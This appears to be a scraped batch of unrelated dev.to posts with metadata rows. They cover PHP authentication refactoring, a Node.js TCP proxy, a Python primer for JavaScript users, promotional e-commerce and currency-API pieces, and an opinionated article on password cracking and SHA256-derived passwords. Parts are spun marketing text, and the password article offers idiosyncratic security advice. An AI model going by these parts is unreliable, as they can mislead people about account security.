To extract a form validation object, we need to go to session/store.php and cut the code that checks if the provided email and password are correct. We then need to move this code to the LoginForm.php file, which is located in the Http/Forms directory.
## LoginForm
The `LoginForm.php` file contains the validation logic for user login, along with a protected `$errors` array that collects any validation errors in the project.
```php
<?php

namespace Http\Forms;

use Core\Validator;

class LoginForm {
    protected $errors = [];

    public function validate($email, $password) {
        if (!Validator::email($email)) {
            $this->errors['email'] = 'Please provide a valid email address.';
        }

        if (!Validator::string($password)) {
            $this->errors['password'] = 'Please provide a valid password.';
        }

        return empty($this->errors);
    }

    public function errors() {
        return $this->errors;
    }

    public function error($field, $message) {
        $this->errors[$field] = $message;
    }
}
```
Now we can see that project is working well.
## Extract Authenticate Class
Next, to extract an authenticator class, we gather all the code segments used to authenticate the user, such as checking the user's email and password. We then add a new file `Authenticator.php`, which contains an `Authenticator` class responsible for user authentication, including the login and logout functions.
```php
<?php

namespace Core;

class Authenticator {
    public function attempt($email, $password) {
        $user = App::resolve(Database::class)
            ->query('select * from users where email = :email', [
                'email' => $email
            ])->find();

        if ($user) {
            if (password_verify($password, $user['password'])) {
                $this->login(['email' => $email]);

                return true;
            }
        }

        return false;
    }

    public function login($user) {
        $_SESSION['user'] = ['email' => $user['email']];

        session_regenerate_id(true);
    }

    public function logout() {
        $_SESSION = [];
        session_destroy();

        $params = session_get_cookie_params();
        setcookie('PHPSESSID', '', time() - 3600, $params['path'], $params['domain'], $params['secure'], $params['httponly']);
    }
}
```
## Update session store file
Moving on, we go back to `session/store.php` and create a new `LoginForm` instance for the user login. We then use an if condition to check whether the form input is valid. If validation passes and authentication succeeds, the user is redirected; otherwise an error is attached to the form and the login view is rendered with the errors.
```php
<?php

use Core\Authenticator;
use Http\Forms\LoginForm;

$email = $_POST['email'];
$password = $_POST['password'];

$form = new LoginForm();

if ($form->validate($email, $password)) {
    if ((new Authenticator)->attempt($email, $password)) {
        redirect('/');
    }

    $form->error('email', 'No matching account found for that email address and password.');
}

return view('session/create.view.php', [
    'errors' => $form->errors()
]);
```
By making these changes, we extract an Authenticator class, which makes our code easier to understand and modify.

I hope that you have understood it clearly.
1,917,811 | dddffg | eettttttt | 0 | 2024-07-09T20:53:23 | https://dev.to/szizyava/dddffg-4jnl | eettttttt | szizyava | |
1,917,765 | Kirill Yurovskiy: Digital Strategies and E-commerce | In the present interconnected world, organizations of all sizes are tracking down uncommon chances to... | 0 | 2024-07-09T20:00:02 | https://dev.to/alexgrace012/kirill-yurovskiy-digital-strategies-and-e-commerce-1mbg | In the present interconnected world, organizations of all sizes are tracking down uncommon chances to grow their span across borders. The computerized insurgency has destroyed customary obstructions to sections, permitting organizations to take advantage of worldwide business sectors with no sweat. Be that as it may, progress in this new scene requires a modern comprehension of computerized systems and online business best practices. We should investigate how organizations can use these apparatuses to flourish in the worldwide commercial center.

**The Global E-commerce Boom**
The numbers don't lie: global e-commerce sales are projected to reach $6.3 trillion by 2024, according to eMarketer. This explosive growth is driven by increasing internet penetration, the proliferation of smartphones, and changing consumer behavior. For businesses, this represents a once-in-a-generation opportunity to reach customers far beyond their local markets.

However, entering the global arena isn't as simple as setting up an online store and hoping for the best. It requires a carefully crafted digital strategy that accounts for the unique challenges and opportunities of operating in diverse markets, says [Yurovskiy Kirill](https://fundly.com/kirill-yurovskiy-smart-expansion-into-new-markets).
## Building a Strong Digital Foundation
The cornerstone of any successful global e-commerce strategy is a robust digital infrastructure. This includes:
1. A responsive, mobile-friendly website: With mobile commerce accounting for over 70% of e-commerce sales in some markets, having a site that performs flawlessly on smartphones is non-negotiable.
2. Multiple language options: Offering your website in the local language of your target markets can significantly boost conversion rates. Tools like WPML for WordPress or Weglot can streamline the process of creating a multilingual site.
3. Localized content: Beyond mere translation, your content should be culturally relevant and resonate with local audiences. This might involve adapting product descriptions, imagery, and marketing messages to suit local tastes and customs.
4. Secure payment gateways: Offering a variety of payment options that are popular in your target markets is crucial. This could include local payment methods like Alipay in China or SEPA in Europe, alongside global options like PayPal and major credit cards.
5. Robust logistics and fulfillment capabilities: Partnering with local or regional fulfillment centers can help reduce shipping times and costs, improving customer satisfaction.
## Leveraging Data for Market Insights
In the digital age, data is king. Successful global businesses use advanced analytics to gain deep insights into their target markets. This includes:

- Market size and growth potential
- Consumer behavior and preferences
- Competitive landscape
- Regulatory environment

Tools like Google Analytics, SEMrush, and local market research reports can provide valuable data to inform your strategy. The key is to use this data to make informed decisions about product offerings, pricing strategies, and marketing approaches.
## Mastering Digital Marketing for Global Audiences
Once you've built a solid digital foundation, the next step is to attract and engage customers. This requires a nuanced approach to digital marketing that accounts for local preferences and platforms. Key strategies include:
1. Search Engine Optimization (SEO): Optimizing your site for local search engines (not just Google, but also platforms like Baidu in China or Yandex in Russia) can dramatically increase your visibility.
2. Content Marketing: Creating high-quality, locally relevant content can help establish your brand as an authority in your industry and improve your search rankings.
3. Social Media Marketing: Different social platforms dominate in different markets. While Facebook and Instagram might be your go-to in the West, platforms like WeChat in China or LINE in Japan may be more effective in Asian markets.
4. Influencer Partnerships: Collaborating with local influencers can help you quickly build credibility and reach in new markets.
5. Paid Advertising: Platforms like Google Ads and Facebook Ads offer sophisticated targeting options that allow you to reach specific demographics in your target markets.
## Navigating Regulatory Challenges
Operating in global markets brings a host of regulatory challenges. From data protection regulations like GDPR in Europe to e-commerce rules in countries like India, navigating this complex landscape requires careful planning and often local expertise.

**Key areas to consider include:**

- Data protection and privacy regulations
- Consumer protection rules
- Tax implications, including VAT and customs duties
- Intellectual property rights
- Local business registration requirements

Many companies find it necessary to work with local legal experts or use platforms like Avalara for tax compliance to ensure they're operating within the bounds of local regulations.
## Embracing Cross-Border E-commerce Platforms

For smaller businesses or those just beginning their global expansion, cross-border e-commerce platforms can provide a valuable entry point. Marketplaces like Amazon Global, eBay International, or Alibaba's Tmall Global allow businesses to reach international customers without the need to set up local entities or manage complex logistics.
These platforms handle many of the challenges of international sales, including payments, shipping, and often even language translation. However, they also come with increased competition and platform fees that can eat into margins.
## The Power of Personalization
In a global marketplace, one size rarely fits all. Successful businesses use advanced personalization techniques to tailor the shopping experience to individual preferences. This might involve:

- Recommending products based on browsing history
- Displaying prices in local currencies
- Showing locally relevant promotions or deals
- Adapting the user interface to local cultural norms

AI and machine learning technologies are making it easier than ever to deliver highly personalized experiences at scale. Platforms like Dynamic Yield or Monetate can help businesses implement sophisticated personalization strategies.
## Building Trust Across Borders
Trust is the currency of e-commerce, and building it across cultural and linguistic boundaries can be challenging. Strategies to enhance trust include:

- Displaying security badges and certifications prominently
- Offering transparent shipping and return policies
- Providing excellent customer service in local languages
- Showcasing authentic customer reviews and testimonials

Tools like Trustpilot or Yotpo can help businesses collect and display customer reviews, while AI-powered chatbots can provide 24/7 customer support in multiple languages.
## The Mobile-First Imperative
In many emerging markets, smartphones are the primary (and often only) means of accessing the internet. This makes a mobile-first approach not just beneficial, but essential. It goes beyond having a responsive website to include:

- Mobile-optimized checkout flows
- Mobile payment options like Apple Pay or Google Pay
- App development for key markets
- SMS marketing campaigns

Businesses that fail to prioritize mobile risk missing out on a huge portion of the global e-commerce market.
## Leveraging Emerging Technologies
As we look to the future, emerging technologies are set to reshape the global e-commerce landscape. Some key areas to watch include:
1. Augmented Reality (AR): Allowing customers to virtually "try on" products or visualize them in their homes.
2. Voice Commerce: As smart speakers become more prevalent, optimizing for voice search and enabling voice-based purchases will be crucial.
3. Blockchain: For enhancing supply chain transparency and enabling new payment methods like cryptocurrencies.
4. Internet of Things (IoT): Creating new touchpoints for commerce through connected devices.
5. 5G Technology: Enabling faster, more reliable connections that can support richer, more interactive e-commerce experiences.
While these technologies are still in their early stages, forward-thinking businesses are already exploring how they can be integrated into their global strategies.
| alexgrace012 | |
1,917,766 | JavaScript to Python for Beginners | Why Learn Python? Python is one of the most popular programming languages in the world,... | 0 | 2024-07-09T20:01:45 | https://dev.to/epifania_garcia_8462512ef/javascript-to-python-for-beginners-1339 | javascript, python, beginners, programming | ## **Why Learn Python?**
Python is one of the most popular programming languages in the world, widely used in various fields such as web development, data analysis, artificial intelligence, scientific computing, and more. It is known for its readability and simplicity, making it an excellent choice for beginners and experienced developers alike. Python's extensive libraries and frameworks such as Django, Flask, Pandas, and TensorFlow, enable developers to build complex applications efficiently.
---
## **Essential Syntax: A Quick Overview**
**1. Data Types**
In Python, common data types include integers `int`, floating-point numbers `float`, strings `str`, lists, tuples, sets, and dictionaries.
```
# Integers and floats
x = 10
y = 3.14
# Strings
name = "John Doe"
# Lists
fruits = ["apple", "banana", "cherry"]
# Tuples
coordinates = (10.0, 20.0)
# Sets
numbers = {1, 2, 3, 4, 4}
# Dictionaries
person = {"name": "Luke", "age": 19}
```
**2. Variables**
Variables in Python are dynamically typed, meaning you don't need to declare their type explicitly.
```
# Variables
a = 5
b = "Hello, World!"
```
**3. Code Blocks**
Python uses indentation to define code blocks instead of curly braces `{}` like in JavaScript.
```
# Example of a code block
if a > 0:
    print("a is positive")
else:
    print("a is negative")
```
**4. Functions**
Defining functions in Python is straightforward with the `def` keyword.
```
# Function definition
def greet(name):
    return f"Hello, {name}!"
# Function call
print(greet("Bo"))
```
**5. Conditionals**
Python uses `if`, `elif`, and `else` for conditional statements.
```
# Conditional statements
if x > 0:
    print("x is positive")
elif x == 0:
    print("x is zero")
else:
    print("x is negative")
```
**6. Arrays and Objects**
In Python, lists and dictionaries are the closest equivalents to JavaScript's arrays and objects.
```
# Lists (arrays in JavaScript)
numbers = [1, 2, 3, 4, 5]
# Dictionaries (objects in JavaScript)
car = {
    "brand": "Toyota",
    "model": "Corolla",
    "year": 2020
}
```
**7. Iteration**
Python provides various ways to iterate over sequences, including `for` loops and `while` loops.
```
# For loop
for fruit in fruits:
    print(fruit)

# While loop
count = 0
while count < 5:
    print(count)
    count += 1
```
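If you are used to JavaScript's index-based `for (let i = 0; i < n; i++)` loop, Python's `range` and `enumerate` cover the same ground (a small illustration; the JavaScript equivalents are shown in comments):

```
# JavaScript: for (let i = 0; i < 3; i++) { console.log(i); }
for i in range(3):
    print(i)

# enumerate() yields the index and the value together, similar to
# array.forEach((item, i) => ...) in JavaScript.
for i, fruit in enumerate(["apple", "banana", "cherry"]):
    print(i, fruit)
```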
---
## **Differences and Similarities Between Python and JavaScript**
#### Differences
**1. Syntax:** Python uses indentation for code blocks, whereas JavaScript uses curly braces.
**2. Data Structures:** Python has built-in support for lists, tuples, sets, and dictionaries, while JavaScript primarily uses arrays and objects.
**3. Functions:** Python functions are defined using `def`, whereas JavaScript uses the `function` keyword or arrow functions `=>`.
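As a small illustration of that difference, here is how a short JavaScript arrow function maps onto Python's `lambda` and `def` (the JavaScript equivalents are shown in comments):

```
# JavaScript: const double = (n) => n * 2;
double = lambda n: n * 2

# For anything longer than a single expression, Python idiom
# prefers a named function defined with def.
def apply_twice(func, value):
    # Apply func to value two times in a row.
    return func(func(value))

print(double(5))               # → 10
print(apply_twice(double, 3))  # → 12
```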
#### Similarities
**1. Dynamic Typing:** Both languages are dynamically typed, allowing for flexible and concise code.
**2. Interpreted Languages:** Both are interpreted languages, making them suitable for scripting and rapid development.
**3. High-level Language:** Both languages are abstracted from low-level details, enabling developers to focus on solving problems.
---
## **Tips for Learning Python as a JavaScript Developer**
**1. Leverage Your JavaScript Knowledge:** Many programming concepts such as variables, loops, and conditionals are similar, so you can focus on Python’s specific syntax and conventions.
**2. Practice with Projects:** Build projects like a web scraper, a simple web app using Flask, or data analysis scripts to get hands-on experience.
**3. Use Interactive Python Environments:** Tools like Jupyter Notebook and IPython can be helpful for experimenting with Python code.
**4. Explore Python Libraries:** Familiarize yourself with popular Python libraries relevant to your interests, such as Django for web development or Pandas for data analysis.
---
## **Learning Resources**
[Official Python Documentation](https://docs.python.org/3/)
[Real Python Tutorials](https://realpython.com/)
[W3Schools Python Tutorials](https://www.w3schools.com/python/default.asp)
[Automate the Boring Stuff with Python](https://automatetheboringstuff.com/)
Learning Python can significantly broaden your programming skills and open up new opportunities in various fields of software engineering. With its simplicity and readability, you'll find that transitioning from JavaScript to Python can be a smooth and rewarding experience. Happy building and best of luck! | epifania_garcia_8462512ef |
1,917,767 | Integrating Exchange Rate APIs for Improved Financial Accuracy | Exchange rate APIs play a crucial role in ensuring financial transactions are conducted accurately... | 0 | 2024-07-09T20:08:56 | https://dev.to/sameeranthony/integrating-exchange-rate-apis-for-improved-financial-accuracy-3fe4 | api, exchange, rate, financial | Exchange rate APIs play a crucial role in ensuring financial transactions are conducted accurately and efficiently. Whether you are running a currency exchange company or managing international transactions, integrating a reliable **[exchange rate API](https://currencylayer.com/)** can significantly enhance the accuracy and timeliness of your financial operations.
## Understanding Exchange Rate APIs
Exchange rate APIs provide real-time or historical currency conversion rates across various currencies. These APIs fetch data from multiple sources and aggregate them into a standardized format such as JSON. This enables developers to seamlessly integrate currency conversion capabilities into their applications, websites, or financial systems.
## Benefits of Using Exchange Rate APIs
- Real-Time Accuracy: By accessing a real-time currency rates API, businesses can ensure that transactions reflect the most current exchange rates, minimizing the risk of financial discrepancies.
- Historical Data: Historical exchange rate APIs allow businesses to analyze past trends and perform accurate financial forecasting based on historical exchange rates.
- Cost-Effectiveness: Many free exchange rate APIs offer basic functionalities without incurring additional costs, making them accessible to startups and small businesses looking to manage currency conversions without a hefty investment.
- Global Coverage: Whether you operate in one country or across continents, currency APIs provide exchange rates for a wide range of currencies, supporting global business operations seamlessly.
## Choosing the Best Exchange Rate API
When selecting an exchange rate API, consider factors such as:
- Data Accuracy: Opt for APIs that source data from reliable financial institutions to ensure accurate and up-to-date information.
- Ease of Integration: Look for APIs with comprehensive documentation and support for multiple programming languages like JavaScript for easy integration into your existing systems.
- Scalability: Ensure the API can handle your anticipated transaction volumes and growth without compromising on performance or reliability.
## Implementing Exchange Rate APIs in Your Business
Integrating an exchange rate API involves:
- API Endpoint Integration: Utilize API endpoints provided by the service to fetch real-time or **[historical exchange rates API](https://currencylayer.com/exchange-rate)**.
- Data Parsing: Convert retrieved data, typically in JSON format, into a usable format within your application or financial system.
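As a minimal sketch of those two steps in Python — note that the payload below only imitates the shape of an exchange rate API response; the exact field names and values are an assumption for illustration:

```python
import json

# Hypothetical sample payload; a real one would come from the API endpoint.
sample_response = """
{
  "success": true,
  "source": "USD",
  "quotes": {"USDEUR": 0.92, "USDGBP": 0.78, "USDJPY": 161.5}
}
"""

def convert(payload, amount, target):
    # Parse the JSON payload, then convert `amount` of the source
    # currency into `target` using the quoted rate.
    data = json.loads(payload)
    rate = data["quotes"][data["source"] + target]
    return amount * rate

print(round(convert(sample_response, 100, "EUR"), 2))  # → 92.0
```

In a real integration you would fetch the payload from the API over HTTPS and add error handling for failed requests and missing currency pairs.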
## Conclusion
Integrating exchange rate APIs into your business operations enhances financial accuracy, streamlines currency conversions, and supports informed decision-making. Whether you're a currency exchange service or managing international payments, leveraging the capabilities of real-time currency rates APIs empowers your business to thrive in the interconnected global marketplace. Choose the best currency API that aligns with your business needs and watch as it transforms the efficiency and reliability of your financial transactions. | sameeranthony |
1,917,768 | How I Build a Scratch Proxy Server Using Node.js | You might be curious about how proxy servers work and how they serve data over the internet. In this... | 0 | 2024-07-09T21:29:43 | https://dev.to/avinash_tare/how-i-build-a-scratch-proxy-server-using-nodejs-55d9 | node, proxy, javascript, core |
You might be curious about how proxy servers work and how they serve data over the internet. In this blog, I am going to implement a proxy server using core NodeJs. I achieved this using a core NodeJs package called `net`, which already comes with NodeJs.
## How Proxy Works
A proxy server is an intermediary between the client and the server. When a client sends a request, it first goes to the proxy server. The proxy server processes the request and forwards it to the main server; the main server sends its response back to the proxy server, and the proxy server delivers the response to the client.

## Set up Proxy Server
Before starting to program, you should know a little about sockets and NodeJs: what a socket is and how sockets work.

In NodeJs there are two ways to implement a proxy server: a custom method and a built-in one. Both are easy to understand.

> To test your proxy server, you can run a local HTTP server on your machine and then target it as the host.

* Now, I will require the `net` package and then define the target server host and port number.
```js
const net = require('net');
// Define the target host and port
const targetHost = 'localhost'; // Specify the hostname of the target server. For Ex: (12.568.45.25)
const targetPort = 80; // Specify the port of the target server
```
* Creating and listening TCP server.
```js
const server = net.createServer((clientSocket) => {
});
// Start listening for incoming connections on the specified port
const proxyPort = 3000; // Specify the port for the proxy server
server.listen(proxyPort, () => {
    console.log(`Reverse proxy server is listening on port ${proxyPort}`);
});
```
- We have created a server using the net package. It's a [TCP](https://www.geeksforgeeks.org/what-is-transmission-control-protocol-tcp/) server running on port number `3000`, as defined by the `proxyPort` variable. When the server starts, it shows the `Reverse proxy server is listening on port 3000` message on the console.
- When a client connects to the proxy server, the callback function passed to `createServer` runs.
- In the server callback we have one parameter, `clientSocket`; it represents the client connection we received.

* Accept and relay data between the user and the target server
```js
const targetHost = 'localhost'; // Specify the hostname of the target server. For Ex: (12.568.45.25)
const targetPort = 80; // Specify the port of the target server

// Create a TCP server
const server = net.createServer((clientSocket) => {
    // Establish a connection to the target host
    const targetSocket = net.createConnection({ host: targetHost, port: targetPort }, () => {
        // When data is received from the client, write it to the target server
        clientSocket.on("data", (data) => {
            targetSocket.write(data);
        });

        // When data is received from the target server, write it back to the client
        targetSocket.on("data", (data) => {
            clientSocket.write(data);
        });
    });
});
```
* When a client connects to the proxy server, we create a connection to the target server using `createConnection`, storing it in `targetSocket`.
* `createConnection` takes an options object with two properties:
  - `host`: the host we want to connect to — in this case our target server host, defined in the `targetHost` variable.
  - `port`: the port we want to connect to — in this case our target server port, defined in the `targetPort` variable.
* Now, when the user sends data, we pass it along to the server using this code:
```js
clientSocket.on("data", (data) => {
    targetSocket.write(data);
});
```
* Then, when the server sends data back, we forward it to the user using this code:
```js
targetSocket.on("data", (data) => {
    clientSocket.write(data);
});
```
* Congratulations! You have successfully created your proxy server.
## Error Handling
While exploring the functionality of the proxy server is exciting, ensuring reliability requires robust error handling to deal with unexpected issues gracefully. To handle these errors we have an event called `error`. It's very easy to implement.
```js
const server = net.createServer((clientSocket) => {
    // Establish a connection to the target host
    const targetSocket = net.createConnection({ host: targetHost, port: targetPort }, () => {
        // Handle errors when connecting to the target server
        targetSocket.on('error', (err) => {
            console.error('Error connecting to target:', err);
            clientSocket.end(); // close connection
        });

        // Handle errors related to the client socket
        clientSocket.on('error', (err) => {
            console.error('Client socket error:', err);
            targetSocket.end(); // close connection
        });
    });
});
```
* When any error occurs, we log it to the console and then close the connection.
## ALL Code
* replace host name and port number according to your preference.
```js
const net = require('net');

// Define the target host and port
const targetHost = 'localhost'; // Specify the hostname of the target server
const targetPort = 80; // Specify the port of the target server

// Create a TCP server
const server = net.createServer((clientSocket) => {
    // Establish a connection to the target host
    const targetSocket = net.createConnection({
        host: targetHost,
        port: targetPort
    }, () => {
        // When data is received from the target server, write it back to the client
        targetSocket.on("data", (data) => {
            clientSocket.write(data);
        });

        // When data is received from the client, write it to the target server
        clientSocket.on("data", (data) => {
            targetSocket.write(data);
        });
    });

    // Handle errors when connecting to the target server
    targetSocket.on('error', (err) => {
        console.error('Error connecting to target:', err);
        clientSocket.end();
    });

    // Handle errors related to the client socket
    clientSocket.on('error', (err) => {
        console.error('Client socket error:', err);
        targetSocket.end();
    });
});

// Start listening for incoming connections on the specified port
const proxyPort = 3000; // Specify the port for the proxy server
server.listen(proxyPort, () => {
    console.log(`Reverse proxy server is listening on port ${proxyPort}`);
});
```
# Built-in Method
To reduce the complexity of relaying data between the client and server connections, we have the built-in method `pipe`. I will replace this syntax
```js
// When data is received from the target server, write it back to the client
targetSocket.on("data", (data) => {
    clientSocket.write(data);
});

// When data is received from the client, write it to the target server
clientSocket.on("data", (data) => {
    targetSocket.write(data);
});
```
Into this syntax
```js
// Pipe data from the client to the target
clientSocket.pipe(targetSocket);
// Pipe data from the target to the client
targetSocket.pipe(clientSocket);
```
## Here is all the code
```js
const net = require('net');
// Define the target host and port
const targetHost = 'localhost';
const targetPort = 80;
// Create a TCP server
const server = net.createServer((clientSocket) => {
// Establish a connection to the target host
const targetSocket = net.createConnection({
host: targetHost,
port: targetPort
}, () => {
// Pipe data from the client to the target
clientSocket.pipe(targetSocket);
// Pipe data from the target to the client
targetSocket.pipe(clientSocket);
});
// Handle errors
targetSocket.on('error', (err) => {
console.error('Error connecting to target:', err);
clientSocket.end();
});
clientSocket.on('error', (err) => {
console.error('Client socket error:', err);
targetSocket.end();
});
});
// Start listening for incoming connections
const proxyPort = 3000;
server.listen(proxyPort, () => {
console.log(`Reverse proxy server is listening on port ${proxyPort}`);
});
```
## A Working Proxy Server!
{% embed https://www.loom.com/share/351e68997b084bf38aa132d8831436d3?sid=b1b6cac4-102e-46b3-81e5-b5e8120ad7b1 %}
Follow Me On GitHub [avinashtare](http://github.com/avinashtare/), Thanks.
| avinash_tare |
1,917,769 | 10 Billion Passwords Cracked: Do You Even Understand Password Cracking? Do You, Really? | Introduction If you understood how passwords were cracked, you'd never use a... | 0 | 2024-07-09T20:13:35 | https://dev.to/raddevus/10-billion-passwords-cracked-do-you-even-understand-password-cracking-do-you-really-37ho | ## Introduction
If you understood how passwords were cracked, you'd never use a natural-language word in your password again. And, that alone could make you entirely safe. Yes, I'll explain how that could make you safe further along in this article.
I'm taking a bit of an alternate view so we can think differently about what password cracks actually mean, and if passwords are just entirely unusable or not.
## Background
All of the Security Geniuses tell you that passwords are a failed technology because so many passwords are cracked. But, why don't they ever clearly explain how passwords are cracked?
There seems to be a Movement that is trying to get rid of passwords that you own.
## The Bombastic News
One of the problems is that the news covers low-brow technical issues in a bombastic way ("high-sounding but with little meaning").
Check out this article from today on LinkedIn.
[Nearly 10 billion passwords leaked | LinkedIn](https://www.linkedin.com/news/story/nearly-10-billion-passwords-leaked-6091644/)

10 Billion passwords!? What?
## Let's Rip That Article Apart Now, Shall We?
The article states:
> "...almost 10 billion unique passwords have been posted to a hacking forum"
That leads you to believe that 10 Billion plaintext passwords ripe for the using have been posted.
However, that cannot be true. Because if it were, then what would the other sentences in the article mean? Especially the last one:
> It could enable "brute-force attacks," which use trial and error to rapidly test a large number of passwords and gain access to systems that aren't protected.
Why would attackers need to do "brute-force attacks which use trial and error" when they have the passwords in the clear? Well, that's because they don't.
It is Alarmist reporting. I followed the links to the source article (on qz.com) and that article is even shorter and doesn't explain it at all. So, they did not post 10 Billion plaintext passwords at all.
But you already knew that Journalists do no work at all. They just make up sentences, then other "news" sites pick up the information and repeat it and it provides it with gravitas so the truth is no longer necessary. As long as you have shocking headlines, you win.
## The Thing They Never Explain
Often the news reports these kinds of numbers and they report bad passwords, right?
It is obvious that many of those accounts and passwords are just for fake accounts or "pass-by" accounts where users have created a quick account to discover more information about a company or get a free item or whatever.
## The Point: Fake Accounts With Bad Passwords
So, even though there are really bad passwords like (password1, abc123) what they don't explain to the reader is that there are millions of accounts created by pass-by users and others created by hackers and those users don't care about the password at all.
## Yes, Normal People Create Bad Passwords
Yes, I know, normal people create terrible passwords. However, there is a simple thing they can do to make their passwords safe: Never use a natural-language word in the password.
## The Solution
Instead, create a completely random set of characters as your password.
## The Problem
Normal users would have no way to remember a set of random characters.
Obviously, that can be solved by forcing the user to use a Password Manager which generates random passwords.
## The Weird Solution: Hamster Method
Here's a way to make a normal user's accounts almost entirely safe. Please chime in and comment below to argue why this might not be true.
Here are the steps:
1. Create one random password for the user's main email account by having a hamster run across the keyboard.
2. I just dropped my hamster on my keyboard and got : adgy788t6ops;ldfkyudt621@DCG32#@&
3. Use this one for her master password on her email account. That way her main email account is protected with a random strong password.
4. Write this down and keep in a sealed lock box -- at some point the user will have it memorized
5. After that, every time the user creates a new account she should drop the hamster on the keyboard again and generate a password, but for these accounts they do not need to be written down anywhere? What?
6. Each time the user goes to sign into any of the other accounts she will always simply say, "oh, I don't know my password, please reset the account" sent to her main email account.
7. She will retrieve the reset from the main email account and login
8. Now there is only one Main password to remember / use and the other ones will all just be reset every time. Isn't this GENIUS?!
My point is: If No One Knows Your Password (including you), It's Secure
## My Real Point Is : Random!
My real point is that passwords must be random so they cannot be guessed.
But, to better state that point, I'd like to say this:
Passwords must not include any pattern that someone can detect as a pattern.
That's true random.
## How Crackers Crack Passwords
People seem to forget how crackers actually crack the passwords.
## Ignore PlainText Storage
Let's ignore the companies which are storing your password in plaintext, ok? Do they still exist? I hope not. If they do then you are toast. No getting around that. Crackers going to crack and they going to get a password trove that is in plaintext.
## Generate All The Hashes & Compare
The real way that crackers get passwords is:
1. Write an algorithm which hashes suspected passwords and password phrases to generate a huge database of hashes.
2. Compare those hashes to what they find in the trove they exfiltrate from a company.
That's it!
## Think About The Size of SHA256 Hash
So, a 256-bit value can take on 2^256 possible values.
The max value is :
115,792,089,237,316,195,423,570,985,008,687,907,853,269,984,665,640,564,039,457,584,007,913,129,639,935
Let's refer to that number as HUGE-NUMBER.
## Reach In Bag, Pull One Random Item Out
Think about this experiment.
1. Reach into a bag (without looking) which contains HUGE-NUMBER of items and randomly pull one item out.
2. Throw the item back into the bag with the rest of HUGE-NUMBER items.
3. Reach in a second time (without looking) and attempt to randomly pull the same one out again. Practically impossible!
### Why does this matter?
This matters because any unique input will produce a new and unique output. At this point there are no collisions known in the SHA256 algorithm.
### Why does any of this matter?
It matters, because we are going to use a SHA256 hash as our password.
Why? Because the SHA256 value is random. It's the equivalent of having a hamster run over your keyboard and create a password.
## But How Are SHA256 Hashes Generated?
Well, we don't have to know the dark details of exactly how the SHA256 algorithm works, but we do need to know how to generate one.
We can use libraries which contain the SHA256 algorithm to generate SHA256 hashes.
Microsoft provides such a library and you can get to it via PowerShell
## PowerShell Script to Create SHA256 From Any Text
```powershell
param (
[string]$target = $(Read-Host)
)
$stringAsStream = [System.IO.MemoryStream]::new()
$writer = [System.IO.StreamWriter]::new($stringAsStream)
$writer.write($target)
$writer.Flush()
$stringAsStream.Position = 0
$outHash = Get-FileHash -InputStream $stringAsStream | Select-Object Hash
$outHash.hash.ToLower()
```
1. First we read in a string value provided by the user ($target) at the command line.
2. Next, we set up a StringStream and set the value to the user-supplied string ($target)
3. Next, we call Get-FileHash (generates SHA256) and pass the user-supplied string to it
4. Finally, we lowercase the hash just for consistency.
Here are some words that I've hashed for you. I ran this on my Ubuntu 22.04.4 system.

## 64 Characters Long
The hashes are 64 characters long because each of the 32 bytes (256 bits / 8 bits per byte = 32 bytes) is represented by a 2-character hexadecimal value.
Get the source (at the top of this article) and you can try it too.
Here's a list of random words and their SHA256 hashes.

## My Suggestion Is One I Use
My suggestion is that instead of making up a password again, you instead generate a SHA256 hash and use that as your password.
## Couldn't A Cracker Generate The Same Hash?
But, wait, can't someone just use the same words I used to generate a SHA256 hash and then compare their hash to mine and then know what my password is?
Well, not really. Here's why.
## Make Your Hash Salty
First of all you'd need to use two pieces of data in your hash so you could create very random hashes.
In order to make it more difficult (or theoretically impossible) for someone to get our original value, we need to add a 2nd value to our initial input. This 2nd value is called a salt.
## Salt: Additional Word Or Phrase
For example we could create an additional word or phrase that we would append to every input that we will hash.
Here's all of the previous words with their associated hashes after adding the same salt to each one.

See how different the hashes are now? They're not guessable by any means. If they were then SHA256 hash algorithm would be cracked.
## Keep That Salt Secret
But, you have to keep that salt secret. If it gets out then the cracker can generate all the words in the dictionary and hash them and then brute-force compare them all to the trove of SHA256 hashes that are in the 10 Billion password vault.
## What You Really Need Is A Program To Do This For You
I just so happen to have written such a program and it is FOSS (Free and Open Source Software) and it is FREE forever.
That means:
- You can try it for FREE
- You can use it for FREE
- You can examine and alter the software all you want...for FREE
## Try It For Free

You can try it, right now, in your browser if you want. Just go to [C'YaPass: Never type a password again](https://cyapass.com/js/cya.htm) and you'll see something like the following:

## SiteKeys: Add Your Own
Of course, you won't have any siteKeys, but you can add them.
There are two parts to generating your password.
1. The SiteKey - unique string you make up to remember which site you'll use this pwd on.
2. A pattern you draw which generates a value - this is the salt to randomize the SHA256 hash
Finally, the value at the lower right of the screen is a 64-character password (SHA256 hash) you can use on the site.
## Your Passwords Aren't Stored Anywhere, They're Generated Every Time
This is cutting edge technology because your passwords are never stored anywhere.
To generate your password, you have to:
1. Select your SiteKey
2. Draw your pattern
## You Only Need One Pattern
Because the pattern is the salt, each time you change your sitekey (select a different one on the left side) you will get a new password for the associated site. So you don't have to change the pattern for every sitekey.
## Your Passwords Will Not Be Based On Natural-Language Words
This means your passwords will be random numbers and characters. They will not be in cracker's rainbow tables as targets to match.
## Sites Will Hash Your Hash
When you use these hashes as your password, the sites you log into will then hash it to save it on their site which is interesting too.
But, I've added another layer of protection.
## Multi-Hash: Hash Your Hash Numerous Times
Take a look at the updated C'YaPass and you'll see I've added the ability for you to hash the initial value X number of times (selectable by you). See the red highlighted section. If you change that value, then all of your hashes will be hashed X (10 in the example) extra times.

## Conclusion
1. If you wanted really strong passwords, you would never use natural-language words in your passwords. EVER!
2. It seems that Password Problems are being reported on improperly to gain attention and to scare people for some reason. Passwords are fine and you own them yourself. But, they should never include words from natural-language. NEVER!
3. The reported password breach of 10 Billion passwords is obviously reported improperly. Those are not plaintext passwords but instead are (most likely) hashes of passwords which, if they include natural-language words, crackers may be able to recover by generating and matching SHA256 hashes. That's the real password cracking technology today: hash matching.
## Hash Matching
Since hash matching is the real way crackers crack passwords, you now understand better what crackers are doing. And since you understand it better, you know you NEVER want to have natural-language words in your passwords.
To protect yourself, use a password generator which generates random passwords.
If you liked this article, check out my github sources for C'YaPass:
[Web based solution](https://github.com/raddevus/CYaPass-Web) - (also seen at https://cyapass.com/js/cya.htm)
[ElectronJS](https://github.com/raddevus/CYaPass-Electron) (cross-platform solution) - runs on macOs, Windows, Linux
And don't believe everything you read about passwords. 🤓 | raddevus | |
